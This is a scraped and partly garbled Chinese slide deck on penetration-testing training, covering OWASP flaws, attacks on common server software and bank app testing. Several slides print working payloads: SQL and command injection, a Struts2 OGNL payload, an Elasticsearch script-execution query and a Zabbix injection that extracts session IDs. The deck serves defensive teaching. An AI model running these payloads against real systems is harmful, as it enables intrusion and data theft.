




版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡介
信息平安技術(shù)培訓(xùn)——浸透測試、演示劉冬-3-28V
第一頁,共80頁。什么是浸透測試應(yīng)用程序浸透測試方法互聯(lián)網(wǎng)攻擊常見手段金融行業(yè)平安測試第二頁,共80頁。什么是浸透測試浸透測試〔PenetrationTesting〕——是為了證明網(wǎng)絡(luò)防御按照預(yù)期方案正常運(yùn)行而提供的一種機(jī)制。實(shí)現(xiàn)原理: 根據(jù) 對或未知破綻測試、模擬攻擊 目地 重點(diǎn):降低風(fēng)險(xiǎn)、完善目前的平安策略 特點(diǎn) 人工檢測、工具掃描、可控非破壞第三頁,共80頁。什么是浸透測試浸透測試流程
第四頁,共80頁。浸透測試浸透測試工具
BurpSuiteHttpAnalvzerIEWatchFiddlerFireBugCharlesHttpliveheadersSQLmapNmapAwvsAppscanHP-WebinspectCoreImpactMetasploitNessusNexpose第五頁,共80頁。什么是浸透測試應(yīng)用程序浸透測試方法互聯(lián)網(wǎng)攻擊常見手段金融行業(yè)平安測試第六頁,共80頁。基于Web浸透測試掃描解析輸入Web主機(jī)風(fēng)險(xiǎn)信息搜集解析應(yīng)用程序分析應(yīng)用程序,會話機(jī)制、客戶端控件等SQL、XSS、RFI等測試代理、配置不當(dāng),中間件等識別分析與利用第七頁,共80頁。HackingOWASPTOP10注入破綻跨站腳本失效的身份驗(yàn)證和回話管理不平安的直接對象引用CSRF平安配置錯(cuò)誤不平安的加密存儲沒有限制URL訪問傳輸層保護(hù)缺乏未驗(yàn)證的重定向和轉(zhuǎn)發(fā)第八頁,共80頁。Hacking注入破綻——SQL注入Select*fromtable_namewhereid=1Select*fromtable_namewhereid=1’Select*fromtable_namewhereid=1
and1=1Select*fromtable_namewhereid=1and1=2Select*fromtable_namewhereid=1and(select……)InjectionTools:1、SQLHelper2、SQLMAP(v1.0d)第九頁,共80頁。Hacking注入破綻——SQL注入事實(shí)上,對錯(cuò)誤信息進(jìn)展封裝并不一定能阻止攻擊者的入侵行為,封裝的錯(cuò)誤信息,但是攻擊己經(jīng)形成,有攻擊者能根據(jù)封裝的錯(cuò)誤信息對攻擊結(jié)果進(jìn)展判斷,繼續(xù)施行攻擊。其實(shí)盲注就是通過封裝的消息來搜集攻擊過程中需要的信息。第十頁,共80頁。Hacking注入破綻——命令注入POST/aim/synRequest.doHTTP/1.1????method=trace_route&ip=&m=5&w=2|ifconfig11第十一頁,共80頁。Hacking跨站腳本存儲型反射型DOM型12第十二頁,共80頁。Hacking跨站腳本原理簡單,利用卻不簡單WEB2.0是XSS的新溫床XSS/CSRFWORM:Samyworm&Sinaweiboworm1、跨站URL:2、由JS發(fā)起CSRF:a、發(fā)微博b、加關(guān)注c、發(fā)私信AboutSamyWorm::///wiki/Samy_(XSS)13第十三頁,共80頁。Hacking任意文件讀取14第十四頁,共80頁。Hacking任意文件讀取15第十五頁,共80頁。Hacking任意文件讀取16第十六頁,共80頁。Hacking任意文件讀取17第十七頁,共80頁。Hacking任意文件讀取18第十八頁,共80頁。Hacking上傳破綻——修改參數(shù)19第十九頁,共80頁。Hacking上傳破綻——欺騙20第二十頁,共80頁。Hacking上傳破綻——APP客戶端21第二十一頁,共80頁。Hacking認(rèn)證錯(cuò)誤——原始信息的校驗(yàn)方式1、不校驗(yàn)——直接構(gòu)造惡意數(shù)據(jù)修改密碼2、校驗(yàn)COOKIE——CSRF22第二十二頁,共80頁。Hacking目錄遍歷——挪動(dòng)代理效勞器第二十三頁,共80頁。Hacking錯(cuò)誤信息——“友好〞的返回信息24第二十四頁,共80頁。Hacking錯(cuò)誤信息——HTTPFuzzing對錯(cuò)誤信息的利用25第二十五頁,共80頁。Hacking參數(shù)錯(cuò)誤——權(quán)限的鑒別://site/d477340ffa28755c?OpenDocument://site/d477340ffa28755c?EditDocumentOpenDocumentEditDocument第二十六頁,共80頁。Hacking參數(shù)錯(cuò)誤——權(quán)限的鑒別第二十七頁,共80頁。Hacking參數(shù)錯(cuò)誤——權(quán)限的鑒別第二十八頁,共80頁。Hacking邏輯錯(cuò)誤一個(gè)密碼找回的邏輯錯(cuò)誤獲取驗(yàn)證碼為5為純數(shù)字,有效期為30分鐘,可以暴力破解。通過HTTPFUZZING獲得第二十九頁,共80頁。Hacking邏輯錯(cuò)誤第三十頁,共80頁。Hacking邏輯錯(cuò)誤一個(gè)密碼找回的邏輯錯(cuò)誤第三十一頁,共80頁。Hacking邏輯錯(cuò)誤修改任意賬號密碼第三十二頁,共80頁。什么是浸透測試應(yīng)用程序浸透測試方法互聯(lián)網(wǎng)攻擊常見手段金融行業(yè)平安測試33第三十三頁,共80頁?;ヂ?lián)網(wǎng)攻擊常見的DjangoCacti0dayFreenasHudsonSquidBeanshellZabbixJboss …第三十四頁,共80頁。互聯(lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Struts演示如何利用Struts進(jìn)入你的效勞器?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29}第三十五頁,共80頁?;ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Struts演示36第三十六頁,共80頁?;ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Struts演示夢網(wǎng)合作自助效勞12590遠(yuǎn)程代碼執(zhí)行37第三十七頁,共80頁?;ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Struts演示挪動(dòng)學(xué)院38第三十八頁,共80頁?;ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Heartbleed、1.0.1a、1.0.1b、1.0.1c、1.0.1d、、、等版本39第三十九頁,共80頁?;ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防SplunkXSSOpenSSLTLS心跳信息泄漏破綻未受權(quán)訪問代碼執(zhí)行40第四十頁,共80頁?;ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Splunk代碼執(zhí)行41第四十一頁,共80頁?;ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防SAP破綻演示SAPNetWeaver是基于專業(yè)標(biāo)準(zhǔn)的集成化應(yīng)用平臺,可以大幅度降低系統(tǒng)整合的復(fù)雜性。其組件包括門戶、應(yīng)用效勞器、商務(wù)智能解決方案以及系統(tǒng)整合和數(shù)據(jù)整合技術(shù)。42第四十二頁,共80頁?;ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Hadoop通過hadoop,hbase,hdfs0.2RC版本的管理web端能遠(yuǎn)程執(zhí)行命令,通過該節(jié)點(diǎn)對集群效勞器進(jìn)展任務(wù)分發(fā)〔該是根本功能,當(dāng)然可以進(jìn)展批量提權(quán)l(xiāng)inux主機(jī)〕浸透進(jìn)hadoop集群。43第四十三頁,共80頁?;ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Elasticsearch:9200/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22exp%22:{%22script%22:%22String%20str%3DSystProperty(\%22\%22);\%22[os:\%22%2bstr.toString()%2b\%22/]\%22;%22}}}44第四十四頁,共80頁?;ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Zend,ThkphpZendframework讀取任意文件Demo選擇的原因:腳本小子只會讀取任意文件,高級黑客能拿來做什么?內(nèi)網(wǎng)端口掃描內(nèi)網(wǎng)效勞器攻擊HTTP攻擊暴力破解45第四十五頁,共80頁?;ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Cacti0day如何利用Cacti進(jìn)入你的效勞器0day46第四十六頁,共80頁?;ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防ZabbixZabbix弱口令SQl注入mon.php?applications=2and(select1from(selectcount(*),concat((select(selectconcat(cast(concat(sessionid,0x7e,userid,0x7e,status)aschar),0x7e))fromzabbix.sessionswherestatus=0anduserid=1LIMIT0,1),floor(rand(0)*2))xfrominformation_schema.tablesgroupbyx)a)第四十七頁,共80頁?;ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Zenoss第四十八頁,共80頁?;ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Hudson創(chuàng)立任務(wù)Buildamaven2projectBuild寫入execwinshellBuildnow://ip:8080/Buildsconsole第四十九頁,共80頁?;ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防HudsonHiveHQL可以通過transform自定義Hive使用的Map/Reduce腳本,從而調(diào)用shell/python等語言,默認(rèn)皆可用,導(dǎo)致攻擊者可以通過hive接口等相關(guān)操作方式直接獲取效勞器權(quán)限。第五十頁,共80頁?;ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Jboss認(rèn)證繞過控制臺密碼JMXinvokerServlet第五十一頁,共80頁?;ヂ?lián)網(wǎng)攻擊LDAP
52第五十二頁,共80頁?;ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Rsync,NFSCMS生成html靜態(tài)文件通過rsync發(fā)布DemoNFS破綻利用…53第五十三頁,共80頁?;ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防VmwareVMwarevCenterOrchestrator在Web管理工具的實(shí)現(xiàn)上存在平安破綻,可被利用泄露vCenter效勞器密碼。54第五十四頁,共80頁?;ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防F5在多家銀行測試發(fā)現(xiàn),導(dǎo)致內(nèi)網(wǎng)信息泄露第五十五頁,共80頁?;ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防F5登陸繞過驗(yàn)證F5多種設(shè)備和等多個(gè)版本的ssh登錄存在root帳號繞過驗(yàn)證的重大破綻第五十六頁,共80頁。什么是浸透測試應(yīng)用程序浸透測試方法互聯(lián)網(wǎng)攻擊常見手段金融行業(yè)平安測試第五十七頁,共80頁。常見破綻SQL注入Xss跨站腳本攻擊1元購置任意商品查看任意賬號支付額度修改任意用戶密碼轉(zhuǎn)賬破綻查看任意賬號的賬戶金額查看任意用戶的身份信息短信炸彈……
這種可能性有多大?第五十八頁,共80頁。其他方向SSRF(效勞端懇求偽造)假如你的ERP有破綻,并且存在一個(gè)XXE的破綻那么它通過一個(gè)webservices來攻擊你的內(nèi)部核心ERP.第五十九頁,共80頁。其他方向SSRF(效勞端懇求偽造)ORACLEpeoplesoft環(huán)境克隆導(dǎo)致的問題ORACLEERP默認(rèn)密碼ORACLEERP權(quán)限問題ORACLEERPiscript問題ORACLEERP中間件問題ORACLEERP數(shù)據(jù)庫問題第六十頁,共80頁。其他方向Pentesting攻防HaddoopOpenstackSpringHibernateIbatisMongodb…第六十一頁,共80頁。其他方向設(shè)計(jì)缺陷弱口令未受權(quán)訪問敏感信息網(wǎng)絡(luò)浸透環(huán)境配置不合理致命危害權(quán)限繞過拓?fù)鋱D泄露識別分析與利用第六十二頁,共80頁。平安測試應(yīng)用系統(tǒng)破綻測試點(diǎn)--業(yè)務(wù)復(fù)雜容易產(chǎn)生業(yè)務(wù)的邏輯平安問題--問題ALL輸入測試測試方法:提交惡意參數(shù),觀察返回結(jié)果第六十三頁,共80頁。某商行網(wǎng)銀浸透測試結(jié)果第六十四頁,共80頁。某商行APP浸透測試結(jié)果第六十五頁,共80頁。權(quán)限控制破綻最常見和最普遍的破綻,重點(diǎn)測試通過越權(quán)的查詢操作可導(dǎo)致未受權(quán)的用戶直接訪問不應(yīng)用訪問的資源,導(dǎo)致一些敏感信息的泄露,其中包括查詢其他賬戶余額查詢其他賬戶積分查詢其他賬戶身份信息查詢其他賬戶的其他相關(guān)信息平安測試第六十六頁,共80頁。平安測試應(yīng)用系統(tǒng)破綻測試點(diǎn)--平安控件測試使用ComRaider測試ActiveX控件平安密碼控件是否有防鍵盤記錄功能登錄點(diǎn)測試加密控件是否有對密碼進(jìn)展加密企業(yè)網(wǎng)銀繞過key保護(hù)第六十七頁,共80頁。平安測試應(yīng)用系統(tǒng)破綻測試點(diǎn)數(shù)據(jù)校驗(yàn)問題使用提交異常數(shù)據(jù)進(jìn)展測試提交負(fù)數(shù)/超大轉(zhuǎn)賬金額提交負(fù)數(shù)/超大積分賬戶控制積分轉(zhuǎn)換輸入輸出賬戶互換轉(zhuǎn)賬輸入輸
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 莆田學(xué)院《空間分析與決策支持》2023-2024學(xué)年第二學(xué)期期末試卷
- 四川汽車職業(yè)技術(shù)學(xué)院《生物信息學(xué)(雙語)》2023-2024學(xué)年第二學(xué)期期末試卷
- Unit 2 Different families Part A Let's talk Let's learn融合課(教學(xué)設(shè)計(jì))-2024-2025學(xué)年人教PEP版(2024)英語三年級上冊
- 山東女子學(xué)院《統(tǒng)計(jì)建模與軟件》2023-2024學(xué)年第二學(xué)期期末試卷
- 陜西警官職業(yè)學(xué)院《大學(xué)語文》2023-2024學(xué)年第二學(xué)期期末試卷
- 黑龍江農(nóng)業(yè)經(jīng)濟(jì)職業(yè)學(xué)院《工程測量》2023-2024學(xué)年第二學(xué)期期末試卷
- 河南建筑職業(yè)技術(shù)學(xué)院《生物統(tǒng)計(jì)與試驗(yàn)設(shè)計(jì)實(shí)驗(yàn)》2023-2024學(xué)年第二學(xué)期期末試卷
- 廣東技術(shù)師范大學(xué)《老年學(xué)》2023-2024學(xué)年第二學(xué)期期末試卷
- Unit 5 Into the wild 單元教學(xué)設(shè)計(jì) -2024-2025學(xué)年高中英語外研版(2019)必修第一冊
- Unit 4 What can you do PB Let's learn (教學(xué)設(shè)計(jì))-2024-2025學(xué)年人教PEP版英語五年級上冊
- 吉利質(zhì)量協(xié)議
- 空調(diào)系統(tǒng)的應(yīng)急預(yù)案
- 2023玻纖增強(qiáng)聚氨酯門窗工程技術(shù)規(guī)程
- 汽車維修廠車輛進(jìn)出廠登記制度
- 部編版七年級語文下冊全冊教案設(shè)計(jì)(表格式)
- 浙江2023公務(wù)員考試真題及答案
- 船舶結(jié)構(gòu)與貨運(yùn)PPT完整全套教學(xué)課件
- Q-SY 08136-2017 生產(chǎn)作業(yè)現(xiàn)場應(yīng)急物資配備選用指南
- 食品分析復(fù)習(xí)資料
- ROCHE甲功及腫瘤項(xiàng)目介紹專家講座
- 3C強(qiáng)制性產(chǎn)品認(rèn)證整套體系文件(2022年版)
評論
0/150
提交評論